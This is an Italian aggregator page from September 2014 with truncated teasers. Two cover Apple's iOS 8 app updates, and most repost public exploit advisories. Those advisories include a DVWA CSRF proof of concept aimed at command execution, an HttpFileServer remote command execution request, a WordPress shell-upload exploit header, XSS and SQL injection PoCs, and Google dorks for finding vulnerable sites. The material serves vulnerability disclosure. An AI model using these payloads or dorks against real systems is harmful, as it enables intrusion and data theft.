Apple aggiorna tutte le sue applicazioni con l’arrivo di iOS 8

17 settembre 2014 - Fonte: http://www.applezein.net/wordpress

Apple aggiorna tutte le sue applicazioni con l’arrivo di iOS 8.

app_store_15-billion-apps

(adsbygoogle = window.adsbygoogle || []).push({});

Ecco la lista delle applicazioni Apple da aggiornare ad iOS 8:

  • Remote;
  • Trova il mio iPhone;
  • iTunes U;
  • Trova i miei Amici.

Le...

Leggi il seguito »

Apple aggiorna le sue App: Trova il mio iPhone, Podcast, Remote, iTunes U e Trova i miei amici

17 settembre 2014 - Fonte: http://www.calmug.org

AppAPpleA ridosso del lancio di iOS 8 Apple ha appena aggiornato le sue applicazioni non incluse nel sistema. Vengon quindi aggiornate Trova il mio iPhone che include il supporto per iOS 8 e “In famiglia” , viene anche aggiornata Remote (telecomando)  che oltre ad alcune migliorie  delle prestazioni aggiunge il supporto ad iOS 8. iTunesU oltre alla compatibilità aggiunge le scadenze al calendario automaticamente. Trova i miei amici consente di spostare l’elenco di amici sul proprio account iCloud, se necessario.

...

Leggi il seguito »

DVWA Cross Site Request Forgery

16 settembre 2014 - Fonte: http://www.mondounix.com
<!-- There are multiple CSRF issues in DVWA. Attackers can use these CSRF exploits to
  first reset the DVWA database of victim, then make the victim log in using the default resets,
  next crafts another CSRF to change the challenge level to low to make exploitation more probable,
  then use these to craft a command execution CSRF and possibly get a shell. :) 
 
  *This PoC will open calculator as a demo execution in approximately 5 seconds.*
 
  The attacker just needs to know you have DVWA for this to work.
 
  Paulos Yibelo and Tabor N. Shiferaw  2014
 
  -->
 
  <script src='https://ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js' type='text/javascript'>
  </script>
  <div...

Leggi il seguito »

HttpFileServer 2.3.x Remote Command Execution

16 settembre 2014 - Fonte: http://www.mondounix.com
ffected software: http://sourceforge.net/projects/hfs/
Version : 2.3x
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 11-09-2014
# Remote: Yes
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
 
issue exists due to a poor regex in the file ParserLib.pas
 
 
function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
 
 
it will not handle null byte so a request to
 
http://localhost:80/search=%00{.exec|cmd.}
 
will...

Leggi il seguito »

WordPress Slideshow Gallery 1.4.6 Shell Upload

16 settembre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/env python
#
# WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit
#
# WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability (CVE-2014-5460)
#
# Vulnerability discovered by: Jesus Ramirez Pichardo - http://whitexploit.blogspot.mx/
#
# Exploit written by: Claudio Viviani - info@homelab.it - http://www.homelab.it
#
#
# Disclaimer:
#
# This exploit is intended for educational purposes only and the author
# can not be held liable for any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this exploit.
# In any case you disagree with the above statement,stop here.
#
#
# Requirements:
#
# 1) Enabled user management...

Leggi il seguito »

WordPress Photo Album Plus 5.4.4 Cross Site Scripting

15 settembre 2014 - Fonte: http://www.mondounix.com
WP Photo Album Plus Security Vulnerabilities
 
Author: Milhouse 
Download: https://wordpress.org/plugins/wp-photo-album-plus/
Home Page: http://wppa.opajaap.nl/
Google dork: inurl:wp-content/plugins/wp-photo-album-plus
 
Set up:
Wordpress Version: 3.9.1, 3.9.2
WP Photo Album Plus version: 5.4.4, 5.4.3
Client browsers: FireFox 31, Internet Explorer 8-11
 
Issue number 1: A Cross-Site Scripting (reflective) vulnerability.
Details:
The plugin echoes the value of  the http header “User-Agent” back to the client browser. Allowing un-sanitized java script to be inserted. 
 
Severity: Low
 
Proof of Concept (POC):
Request:
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent:...

Leggi il seguito »

Joomla Spider Form Maker 4.3 SQL Injection

15 settembre 2014 - Fonte: http://www.mondounix.com
######################
 
# Exploit Title : Joomla Spider Form Maker <= 4.3 SQLInjection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://web-dorado.com/
 
# Software Link : http://web-dorado.com/products/joomla-form.html
 
# Dork Google: inurl:com_formmaker
 
 
# Date : 2014-09-07
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
 
######################
 
# PoC Exploit:
 
http://localhost/index.php?option=com_formmaker&view=formmaker&id=[SQLi]
 
 
"id" variable is not sanitized.
 
 
######################
 
# Vulnerability Disclosure Timeline:
 
2014-09-07:  Discovered vulnerability
2014-09-09:...

Leggi il seguito »

WordPress Plugin Vulnerability Dump – Part 2

10 settembre 2014 - Fonte: http://www.mondounix.com
More vulnerabilities in poorly coded plugins for y'all.
 
Ninja Forms v2.77 - Authorization bypass (regular users can delete forms, etc)
Contact Form v3.83 - Email header injection
WP to Twitter v2.9.3 - Authorization bypass (regular users can tweet to the admin's twitter account)
Xhanch - My Twitter v2.7.7 - CSRF (create and delete tweets)
TinyMCE Advanced v4.1 - (insignificant) CSRF
W3 Total Cache v0.9.4 - (minor) CSRF
WordPress Download Manager v2.6.92 - Authorization bypass (regular users can upload/delete arbitrary files, yes, even 
php files)
Wordfence Security v5.2.2 - Stored XSS
 
Details and POCs located: https://vexatioustendencies.com/wordpress-plugin-vulnerability-dump-part-2/
 
More to follow.
 
-Voxel...

Leggi il seguito »

WordPress Spider Facebook 1.0.8 SQL Injection

9 settembre 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress Spider Facebook 1.0.8 Authenticated SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://web-dorado.com/
 
# Software Link : http://downloads.wordpress.org/plugin/spider-facebook.1.0.8.zip
 
# Date : 2014-08-25
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0
 
######################
 
# Location :  
http://localhost/wp-content/plugins/plugins/spider-facebook/facebook.php
 
######################
 
# Vulnerable code :
 
function Spider_Facebook_manage()
{
        require_once("facebook_manager.php");
        require_once("facbook_manager.html.php");
...

Leggi il seguito »

WordPress Like Dislike Counter 1.2.3 SQL Injection

9 settembre 2014 - Fonte: http://www.mondounix.com
#################################################################################################
#
# Title                : Wordpress Like Dislike Counter Plugin SQL Injection Vulnerability
# Risk                 : High+/Critical
# Exploit Author       : XroGuE
# Google Dork          : inurl:plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php  AND  plugins/pro-like-dislike-counter/ldc-ajax-counter.php
# Plugin Version       : 1.2.3
# Plugin Name          : Like Dislike Counter
# Plugin Download Link : http://downloads.wordpress.org/plugin/like-dislike-counter-for-posts-pages-and-comments.zip
# Vendor Home          : www.wpfruits.com
# Date                 : 2014/09/05
# Tested in            : Win7 - Linux
#
##################################################################################################
#...

Leggi il seguito »